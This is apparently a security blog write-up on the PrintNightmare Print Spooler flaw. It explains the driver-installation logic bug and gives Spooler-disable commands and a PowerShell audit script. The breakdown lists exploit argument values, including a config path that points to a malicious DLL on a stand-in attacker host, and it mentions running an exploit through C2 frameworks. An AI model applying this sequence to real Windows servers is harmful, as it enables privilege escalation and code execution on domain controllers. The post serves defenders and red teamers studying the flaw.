CVE-2021-1675 / CVE-2021-34527

Update:

Microsoft is also referring to PrintNightmare as CVE-2021-34527, describing CVE-2021-1675 as a different vulnerability in RpcAddPrinterDriverEx that was patched in the June 8th update. CVE-2021-34527 remains unpatched at this time.


Background

Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370) recently posted details on a new vulnerability affecting the Print Spooler service in Windows, leading to LPE and RCE. They also hinted at more Spooler vulnerabilities coming in this year's BlackHat talk!

Vulnerability Breakdown

The RpcAddPrinterDriver function in the Print Spooler service allows users with certain privileges (SeLoadDriverPrivilege) to add drivers to a remote Print Spooler.

Due to a logic flaw in the Print Spooler service, users without these permissions can still add a driver, which can result in LPE/RCE (execution of an arbitrary DLL) on the affected machine running the Print Spooler service!

Argument a4 is user-controllable, allowing a normal user to bypass the security check (the call to ValidateObjectAccess) and add a driver!

This means that any low-privilege user account in a domain could gain LPE/RCE on the Domain Controller if it was running the Print Spooler service!

When calling RpcAddPrinterDriver we supply a few arguments:

pDataFile = A.dll

pConfigFile = \\attackerip\malicious.dll

pDriverPath = C.dll

The Spooler service checks that pDataFile and pDriverPath are not UNC paths, but it DOES allow pConfigFile to be a UNC path. If we set pConfigFile to a malicious DLL on the network, the Spooler will copy that DLL into C:\Windows\System32\spool\drivers\x64\3\malicious.dll

By calling RpcAddPrinterDriver once again, we can set pDataFile to the malicious DLL we copied in the previous call with the pConfigFile argument, and the driver will be loaded.

There may be a copy conflict during the second call, so the exploit implementation may loop through a list of valid drivers, or simply pick the first one in the list to replace.

Exploits

When exploiting this in customer environments during our red team engagements, I'd personally opt for the C# implementation, since you can use it with CS or other C2 frameworks using the execute-assembly equivalent.

Compatibility

Credits to @StanHacked

Detection

GossiTheDog/ThreatHunting (GitHub): tools for hunting for threats.

Prevention

Disable the Print Spooler service on any server in your environment that is not a print server or a Domain Controller.

Microsoft recommends disabling Print Spooler if the machine is not a print server or a Domain Controller.

Mitigation

CVE-2021-1675 was "patched" in the June 8th updates, but CVE-2021-34527 remains unpatched and the only known mitigation strategy is to:

Disable the Print Spooler Service (any of the commands below)

Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
Uninstall-WindowsFeature Print-Services
✌️

Please consider which machine(s) you are disabling Print Spooler on and if you will end up breaking printing in your environment!
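As an added example (not the post's own code), the following PowerShell script turns the role check above into an audit: it reports the Spooler state, leaves Domain Controllers and hosts that share printers alone, and only stops and disables the service when run with the -Enforce switch (a parameter name chosen here). It assumes an elevated PowerShell session on Windows 8 / Server 2012 or later, where Get-Printer is available.

```powershell
# Added example, not from the original post: audit the Print Spooler on the local host
# and disable it only when the machine is neither a Domain Controller nor a print server.
# Assumption: run in an elevated PowerShell session; -Enforce is a name chosen for this script.
param(
    [switch]$Enforce   # without this switch the script only reports
)

# Win32_ComputerSystem.DomainRole: 4 = backup Domain Controller, 5 = primary Domain Controller
$role = (Get-CimInstance -ClassName Win32_ComputerSystem).DomainRole
$isDomainController = $role -ge 4

# A host that shares any printer is treated as a print server
$sharedPrinters = @(Get-Printer -ErrorAction SilentlyContinue | Where-Object { $_.Shared })
$isPrintServer = $sharedPrinters.Count -gt 0

$spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
if (-not $spooler) {
    Write-Output "Spooler service not present; nothing to do."
    return
}

# StartMode is Auto / Manual / Disabled (Disabled corresponds to Start=4 in the registry)
$startMode = (Get-CimInstance -ClassName Win32_Service -Filter "Name='Spooler'").StartMode
Write-Output ("Host={0} DC={1} PrintServer={2} Status={3} StartMode={4}" -f `
    $env:COMPUTERNAME, $isDomainController, $isPrintServer, $spooler.Status, $startMode)

if ($isDomainController -or $isPrintServer) {
    Write-Warning "Host is a Domain Controller or shares printers; Spooler left as-is. Review this host separately."
    return
}

if (-not $Enforce) {
    Write-Output "Candidate for disabling Print Spooler. Re-run with -Enforce to apply."
    return
}

# Same effect as the Stop-Service / REG ADD Start=4 pair in the post
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
Write-Output "Print Spooler stopped and set to Disabled on $env:COMPUTERNAME."
```

Run it once without -Enforce across the estate to get the report, then apply it only to the hosts the report flags as candidates.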

More, more, more!

Here are some other great reads and compilations about the PrintNightmare vulnerability:

Critical Vulnerability: PrintNightmare Exposes Windows Servers to Remote Code Execution
Huntress is aware of a critical remote code execution and local privilege escalation vulnerability known as PrintNightmare. This is a serious security flaw that affects many Windows servers.
Zero day for every supported Windows OS version in the wild — PrintNightmare
zhiniang peng tweeted out a proof of concept exploit and explainer recently, and then quickly deleted it. This exploit and discussion contained an unpatched zero day in all supported and Extended…
PrintNightmare, Critical Windows Print Spooler Vulnerability | CISA
(Updated July 1, 2021) See Microsoft’s new guidance for the Print spooler vulnerability (CVE-2021-34527) and apply the necessary workarounds.